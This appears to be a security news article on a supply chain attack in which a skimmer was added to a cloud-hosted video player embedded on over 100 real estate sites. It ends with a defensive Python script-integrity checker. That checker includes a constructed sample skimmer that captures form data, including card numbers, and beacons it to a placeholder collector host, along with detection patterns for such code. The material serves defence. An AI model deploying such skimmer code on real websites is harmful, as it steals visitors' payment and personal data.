Cloud Video Platform Used By Cybercriminals to Steal Payment Information
More than 100 Real Estate Websites Were Compromised.
Threat actors abused an unnamed cloud video hosting service to inject malicious scripts into more than 100 real estate websites owned by the same holding company. The goal of this supply chain attack was to steal private information that visitors entered into website forms.
These malicious scripts, also known as skimmers, are becoming increasingly common. They are typically injected into compromised websites, or into third-party scripts those websites load, in order to capture sensitive data that users type into the targeted site. Skimmers are frequently planted on the checkout pages of online stores to steal payment card information.
How Does the Attack Work?
According to BleepingComputer, Palo Alto Networks Unit42 spotted a new supply chain attack in which the attackers abused a feature of a cloud video platform to add skimmer code to the JavaScript of a hosted video player. Any website that embeds that player also loads the malicious script, so the site is compromised without its own servers ever being touched.
The supply chain attack proved highly effective: more than 100 websites were affected by the operation, according to the cybersecurity company. The researchers alerted the cloud video provider and assisted the compromised websites in removing the malicious code.
On the next player update, the video platform began serving the skimmer code to every real estate website that already had the player embedded, enabling the script to harvest confidential data entered into the sites' forms. Because the sites pulled the player from the vendor on every page load, a single change to that one hosted file reached all of them at once.
What Kind of Data Was Accessed?
Following an extensive investigation, Unit42 found that the skimmer code was designed to recognise credit card number patterns, collect victim names, email addresses, phone numbers and financial information from form fields, and exfiltrate them to the threat actors.
The skimmer itself is highly polymorphic, elusive, and continuously evolving. Combined with a cloud distribution platform that pushes the same file to many sites, a skimmer of this type can have a very large impact.
For website administrators, the practical advice is to protect the accounts used on third-party platforms (such as the video service) against phishing and social engineering, enable strong authentication on them, and grant only the permissions each account needs. We also strongly recommend running web content integrity checks on a regular basis: record a hash of every external script the site loads while it is known to be clean, and alert when a served copy no longer matches. This detects injected code in content that the site itself does not host.
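The following is an added example of such a content integrity check, written for this article; it is not Unit42's code nor anything the affected sites ran. It extracts the external script tags from a page, hashes each script body in Subresource Integrity (SRI) form, compares the hashes against a baseline taken when the page was known-good, and, for any script that changed, scans the new body for a few illustrative form-harvesting indicators. The HTML, the script bodies, the hostnames (video.example, cdn.example, collector.invalid) and the indicator patterns are all constructed for the demo; the "tampered" player body is a made-up stand-in for an appended skimmer, not the real one.

```python
"""Content integrity monitor for third-party scripts a site embeds.

Added example for this article (not Unit42's or the affected sites' code).
All sample HTML, script bodies and hostnames below are constructed.
"""
import base64
import hashlib
import re
from html.parser import HTMLParser


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every external <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def external_scripts(html):
    """Return the URLs of all externally sourced scripts, in page order."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return parser.sources


def sri_hash(body, algo="sha384"):
    """Return a Subresource Integrity value ('sha384-<base64 digest>') for a script body."""
    digest = hashlib.new(algo, body.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


# Illustrative indicators of form harvesting (assumed heuristics, not a published IoC list):
# a submit hook, an outbound send primitive, and a regex literal for a 13-19 digit run.
SUSPICIOUS = [
    re.compile(r"addEventListener\(\s*['\"]submit['\"]"),
    re.compile(r"\bnavigator\.sendBeacon\b|\bXMLHttpRequest\b|\bfetch\s*\("),
    re.compile(r"\\d\{1[3-9]\}"),
]


def suspicious_indicators(body):
    """Return the indicator patterns that match the given script body."""
    return [p.pattern for p in SUSPICIOUS if p.search(body)]


def check_page(html, fetch, baseline):
    """Compare every external script in html with the baseline.

    fetch(url) returns the script body currently being served; baseline maps
    url -> SRI hash recorded when the page was known-good. Returns one finding
    per script with status 'ok', 'changed' or 'unbaselined'.
    """
    findings = []
    for src in external_scripts(html):
        body = fetch(src)
        current = sri_hash(body)
        expected = baseline.get(src)
        if expected is None:
            findings.append({"url": src, "status": "unbaselined", "sri": current})
        elif current != expected:
            findings.append({"url": src, "status": "changed", "sri": current,
                             "indicators": suspicious_indicators(body)})
        else:
            findings.append({"url": src, "status": "ok", "sri": current})
    return findings


# Constructed sample: a listing page with a contact form and a hosted video player.
SAMPLE_HTML = """<html><body>
<form id="contact"><input name="name"><input name="email"></form>
<script src="https://video.example/player.js"></script>
<script src="https://cdn.example/site.js"></script>
</body></html>"""

CLEAN_PLAYER = "window.Player = function(el){ el.play(); };\n"
# Constructed: the same player file after a form-harvesting script was appended to it.
TAMPERED_PLAYER = CLEAN_PLAYER + (
    "document.addEventListener('submit', function(e){"
    "  var d = new FormData(e.target), o = {};"
    "  d.forEach(function(v,k){ if(/\\d{16}/.test(v)||k.match(/name|mail|phone/i)) o[k]=v; });"
    "  navigator.sendBeacon('https://collector.invalid/c', JSON.stringify(o));"
    "});\n"
)
SITE_JS = "console.log('site');\n"

# Baseline taken while the page was known to be clean.
BASELINE = {
    "https://video.example/player.js": sri_hash(CLEAN_PLAYER),
    "https://cdn.example/site.js": sri_hash(SITE_JS),
}


def demo(tampered=True):
    """Run the check against the constructed page; returns the findings list."""
    live = {
        "https://video.example/player.js": TAMPERED_PLAYER if tampered else CLEAN_PLAYER,
        "https://cdn.example/site.js": SITE_JS,
    }
    return check_page(SAMPLE_HTML, live.__getitem__, BASELINE)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The same SRI value can be placed in the `integrity` attribute of the `<script>` tag (with `crossorigin="anonymous"` for a cross-origin host), in which case the browser refuses to execute a player file whose hash no longer matches. The caveat is the one this incident turns on: a vendor-hosted player is updated legitimately, and each update changes the hash, so a pinned `integrity` value breaks the embed until the baseline is refreshed. Either way, every hash change must be reviewed rather than silently accepted, which is exactly the moment at which an appended skimmer becomes visible.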
Palo Alto Networks has provided a complete list of the IoCs (indicators of compromise) on this GitHub repository.